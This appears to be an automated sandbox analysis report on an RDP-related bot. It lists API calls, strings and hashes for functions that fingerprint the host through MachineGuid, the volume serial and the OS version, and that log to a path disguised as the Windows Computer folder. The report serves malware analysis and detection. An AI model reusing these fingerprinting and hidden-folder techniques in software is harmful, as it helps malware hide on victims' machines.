String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4162578512
Opcode ID: c5b2ae9a7948dd11bc5867709e5fa9ad82dc7d4ef6c1d40c0db95260f6b92eb8
Instruction ID: 307acb7001d81d5046b3ef84ec3f515fc634a569c3ffccb58e60e641c529840a
Opcode Fuzzy Hash: c5b2ae9a7948dd11bc5867709e5fa9ad82dc7d4ef6c1d40c0db95260f6b92eb8
Instruction Fuzzy Hash: C2D16C65A09703C5FB22BB15E8803B9A751AF547C4FF540BADA1DC72A4EE3DE945C320

Function 00007FFE11503420 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE11509FF4: LoadLibraryA.KERNEL32 ref: 00007FFE1150A002

Part of subcall function 00007FFE11509F73: GetProcAddress.KERNEL32 ref: 00007FFE11509F93

FreeLibrary.KERNEL32 ref: 00007FFE115034B3
GetNativeSystemInfo.KERNEL32 ref: 00007FFE115034FF
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11503518
GetLastError.KERNEL32 ref: 00007FFE11503526

Strings

[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE115037DC
~, xrefs: 00007FFE11503747
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11503648
:, xrefs: 00007FFE11503679
C:\Windows, xrefs: 00007FFE11503511, 00007FFE115035FE
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE1150363A, 00007FFE1150370E
P, xrefs: 00007FFE11503750
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11503723
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11503941
MachineGuid, xrefs: 00007FFE11503641
sys_init, xrefs: 00007FFE11503491, 00007FFE115034C6, 00007FFE11503531, 00007FFE1150360C, 00007FFE115036DE, 00007FFE1150371C, 00007FFE115037D5, 00007FFE1150386B, 00007FFE1150393A
%, xrefs: 00007FFE11503627
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11503872
ntdll.dll, xrefs: 00007FFE11503428
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE115036E5
, xrefs: 00007FFE115036F1
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11503498
\, xrefs: 00007FFE1150367E
RtlGetVersion, xrefs: 00007FFE11503440
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11503613
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11503538
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE115034CD

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: a7b22198e87da04587ca094f872e11ebe662094dbe01be4df64eb0879e3e46c0
Instruction ID: d2b23216f7d607feb4b3a7590ca51b7246e9a03f9a577a839e7dfc23a7fefadb
Opcode Fuzzy Hash: a7b22198e87da04587ca094f872e11ebe662094dbe01be4df64eb0879e3e46c0
Instruction Fuzzy Hash: 94D19065E0CE0385F7628B97E4443BE2769AF41770F1540FAC95E072B6DF2DE9848381

Function 00007FFE0EB4E870 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0EB41AA4: LoadLibraryA.KERNEL32 ref: 00007FFE0EB41AB2

Part of subcall function 00007FFE0EB41A23: GetProcAddress.KERNEL32 ref: 00007FFE0EB41A43

FreeLibrary.KERNEL32 ref: 00007FFE0EB4E903
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0EB4E94F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0EB4E968
GetLastError.KERNEL32 ref: 00007FFE0EB4E976

Strings

[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0EB4EC2C
P, xrefs: 00007FFE0EB4EBA0
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0EB4EB73
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0EB4EB35
C:\Windows, xrefs: 00007FFE0EB4E961, 00007FFE0EB4EA4E
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0EB4ECC2
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0EB4EA8A, 00007FFE0EB4EB5E
sys_init, xrefs: 00007FFE0EB4E8E1, 00007FFE0EB4E916, 00007FFE0EB4E981, 00007FFE0EB4EA5C, 00007FFE0EB4EB2E, 00007FFE0EB4EB6C, 00007FFE0EB4EC25, 00007FFE0EB4ECBB, 00007FFE0EB4ED8A
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4E91D
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0EB4E8E8
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0EB4ED91
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0EB4EA98
\, xrefs: 00007FFE0EB4EACE
%, xrefs: 00007FFE0EB4EA77
~, xrefs: 00007FFE0EB4EB97
, xrefs: 00007FFE0EB4EB41
:, xrefs: 00007FFE0EB4EAC9
ntdll.dll, xrefs: 00007FFE0EB4E878
RtlGetVersion, xrefs: 00007FFE0EB4E890
MachineGuid, xrefs: 00007FFE0EB4EA91
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0EB4E988
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0EB4EA63

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
Instruction ID: 2daa8c33c53abfb9cf2336bf25d7de92785300d82188a89b5bacee11b40c1ee2
Opcode Fuzzy Hash: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
Instruction Fuzzy Hash: DED15CA2E0CB5782FA709F19A8843B966A1FF44754F594132C9CE5B2F1DE2CE884CF41

Function 00007FFE0E169770 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E16CF94: LoadLibraryA.KERNEL32 ref: 00007FFE0E16CFA2

Part of subcall function 00007FFE0E16CF13: GetProcAddress.KERNEL32 ref: 00007FFE0E16CF33

FreeLibrary.KERNEL32 ref: 00007FFE0E169803
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0E16984F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0E169868
GetLastError.KERNEL32 ref: 00007FFE0E169876

Strings

RtlGetVersion, xrefs: 00007FFE0E169790
P, xrefs: 00007FFE0E169AA0
%, xrefs: 00007FFE0E169977
~, xrefs: 00007FFE0E169A97
\, xrefs: 00007FFE0E1699CE
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0E169C91
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0E1697E8
sys_init, xrefs: 00007FFE0E1697E1, 00007FFE0E169816, 00007FFE0E169881, 00007FFE0E16995C, 00007FFE0E169A2E, 00007FFE0E169A6C, 00007FFE0E169B25, 00007FFE0E169BBB, 00007FFE0E169C8A
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0E169998
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0E169963
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0E169B2C
MachineGuid, xrefs: 00007FFE0E169991
, xrefs: 00007FFE0E169A41
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0E169A35
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16981D
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0E169888
ntdll.dll, xrefs: 00007FFE0E169778
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0E16998A, 00007FFE0E169A5E
C:\Windows, xrefs: 00007FFE0E169861, 00007FFE0E16994E
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0E169A73
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0E169BC2
:, xrefs: 00007FFE0E1699C9

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
Instruction ID: 7c282bbee82bafe90567b4e7a44e0ebd147d0590c6287177b8491d22871f12c1
Opcode Fuzzy Hash: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
Instruction Fuzzy Hash: 06D15762E0C65B82FB208B14E4803B963A4AF85B95F654033D9CE576F6DE3DE885C781

Function 00007FFE11EC4430 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE11EC2174: LoadLibraryA.KERNEL32 ref: 00007FFE11EC2182

Part of subcall function 00007FFE11EC20F3: GetProcAddress.KERNEL32 ref: 00007FFE11EC2113

FreeLibrary.KERNEL32 ref: 00007FFE11EC44C3
GetNativeSystemInfo.KERNEL32 ref: 00007FFE11EC450F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11EC4528
GetLastError.KERNEL32 ref: 00007FFE11EC4536

Strings

%, xrefs: 00007FFE11EC4637
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE11EC47EC
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11EC4623
, xrefs: 00007FFE11EC4701
C:\Windows, xrefs: 00007FFE11EC4521, 00007FFE11EC460E
MachineGuid, xrefs: 00007FFE11EC4651
\, xrefs: 00007FFE11EC468E
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11EC4733
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11EC4548
~, xrefs: 00007FFE11EC4757
P, xrefs: 00007FFE11EC4760
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE11EC464A, 00007FFE11EC471E
RtlGetVersion, xrefs: 00007FFE11EC4450
sys_init, xrefs: 00007FFE11EC44A1, 00007FFE11EC44D6, 00007FFE11EC4541, 00007FFE11EC461C, 00007FFE11EC46EE, 00007FFE11EC472C, 00007FFE11EC47E5, 00007FFE11EC487B, 00007FFE11EC494A
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11EC44A8
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE11EC46F5
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11EC4658
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC44DD
ntdll.dll, xrefs: 00007FFE11EC4438
:, xrefs: 00007FFE11EC4689
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11EC4882
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11EC4951

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: faec4ae17eb185d37a33eb22cefa78a388db1887f3bae8ef54cde5a0b0eff3d3
Instruction ID: 711b621461edba18d691f1edf1293e316689594ab93c440d323f294f5edde61a
Opcode Fuzzy Hash: faec4ae17eb185d37a33eb22cefa78a388db1887f3bae8ef54cde5a0b0eff3d3
Instruction Fuzzy Hash: 0BD185A2D0CE6781FF209BD6EC403BB6298AF41774F9911B6D94D176B4DE2DF8848381

Function 00007FF76A9093F0 Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76A901694: LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2

Part of subcall function 00007FF76A901613: GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633

FreeLibrary.KERNEL32 ref: 00007FF76A909483
GetNativeSystemInfo.KERNEL32 ref: 00007FF76A9094CF
GetWindowsDirectoryA.KERNEL32 ref: 00007FF76A9094E8
GetLastError.KERNEL32 ref: 00007FF76A9094F6

Strings

9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FF76A90960A, 00007FF76A9096DE
RtlGetVersion, xrefs: 00007FF76A909410
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FF76A9096F3
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF76A90949D
%, xrefs: 00007FF76A9095F7
sys_init, xrefs: 00007FF76A909461, 00007FF76A909496, 00007FF76A909501, 00007FF76A9095DC, 00007FF76A9096AE, 00007FF76A9096EC, 00007FF76A9097A5, 00007FF76A90983B, 00007FF76A90990A
:, xrefs: 00007FF76A909649
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FF76A9097AC
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FF76A909842
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FF76A9096B5
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FF76A909911
MachineGuid, xrefs: 00007FF76A909611
service, xrefs: 00007FF76A9093F3
C:\Windows, xrefs: 00007FF76A9094E1, 00007FF76A9095CE
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF76A909618
\, xrefs: 00007FF76A90964E
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FF76A909508
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FF76A9095E3
ntdll.dll, xrefs: 00007FF76A9093F8
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FF76A909468

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
API String ID: 3828489143-3798070276
Opcode ID: 0d1d712fc87a8e209d2f08d55f3639612ebd728000b1008315dc9a74c2b6575a
Instruction ID: 4bbffb433744940b4c64e71d034a426f1b6e30bab4b999d2d68288bd8bd57ac6
Opcode Fuzzy Hash: 0d1d712fc87a8e209d2f08d55f3639612ebd728000b1008315dc9a74c2b6575a
Instruction Fuzzy Hash: 6FD15C62E0C756C5FB61AB14E4403BAE6A0AF407D4FF540BAC95ED76E0DE2DEC4483A1

Function 00007FFE1150143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1150145C
GetLastError.KERNEL32 ref: 00007FFE11501590

Part of subcall function 00007FFE11509CC0: GetModuleHandleExA.KERNEL32 ref: 00007FFE11509CDE

strlen.MSVCRT ref: 00007FFE115014AE
strlen.MSVCRT ref: 00007FFE115014CA
strcat.MSVCRT ref: 00007FFE115014E5
strlen.MSVCRT ref: 00007FFE115014ED
strlen.MSVCRT ref: 00007FFE11501502
fopen.MSVCRT ref: 00007FFE11501528

Strings

[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11501667
~, xrefs: 00007FFE11501615
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1150157A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE1150148E, 00007FFE115014A4, 00007FFE115014DB, 00007FFE115014F8, 00007FFE11501547
P, xrefs: 00007FFE1150161A
[I] (%s) -> %s, xrefs: 00007FFE115016DB
Done, xrefs: 00007FFE115016CD
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE115015A2
log, xrefs: 00007FFE11501517
debug_init, xrefs: 00007FFE1150154E, 00007FFE11501573, 00007FFE1150159B, 00007FFE11501660, 00007FFE115016D4
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11501555
, xrefs: 00007FFE115015AE
prgmgr.l, xrefs: 00007FFE1150150A

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
API String ID: 3395718042-2735303109
Opcode ID: 3c02316d220b7b555ab5fdc4a3a6744009a41e76f521ed24bef067a88f3ae652
Instruction ID: 15767c086e6246e5b5c29bebd3ef80bcaafc913ee0b80f079535ae80b281568d
Opcode Fuzzy Hash: 3c02316d220b7b555ab5fdc4a3a6744009a41e76f521ed24bef067a88f3ae652
Instruction Fuzzy Hash: F7513050E0CE0386FB619797A8D03BD329EAF057B4F5440FAD50E0B6B2DE6EE9458742

Function 00007FFE0EB4143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB4145C
GetLastError.KERNEL32 ref: 00007FFE0EB41590

Part of subcall function 00007FFE0EB41770: GetModuleHandleExA.KERNEL32 ref: 00007FFE0EB4178E

strlen.MSVCRT ref: 00007FFE0EB414AE
strlen.MSVCRT ref: 00007FFE0EB414CA
strcat.MSVCRT ref: 00007FFE0EB414E5
strlen.MSVCRT ref: 00007FFE0EB414ED
strlen.MSVCRT ref: 00007FFE0EB41502
fopen.MSVCRT ref: 00007FFE0EB41528

Strings

[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0EB415A2
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0EB41667
Done, xrefs: 00007FFE0EB416CD
~, xrefs: 00007FFE0EB41615
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0EB41555
P, xrefs: 00007FFE0EB4161A
, xrefs: 00007FFE0EB415AE
debug_init, xrefs: 00007FFE0EB4154E, 00007FFE0EB41573, 00007FFE0EB4159B, 00007FFE0EB41660, 00007FFE0EB416D4
rdpctl.l, xrefs: 00007FFE0EB4150A
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4157A
log, xrefs: 00007FFE0EB41517
[I] (%s) -> %s, xrefs: 00007FFE0EB416DB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0EB4148E, 00007FFE0EB414A4, 00007FFE0EB414DB, 00007FFE0EB414F8, 00007FFE0EB41547

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
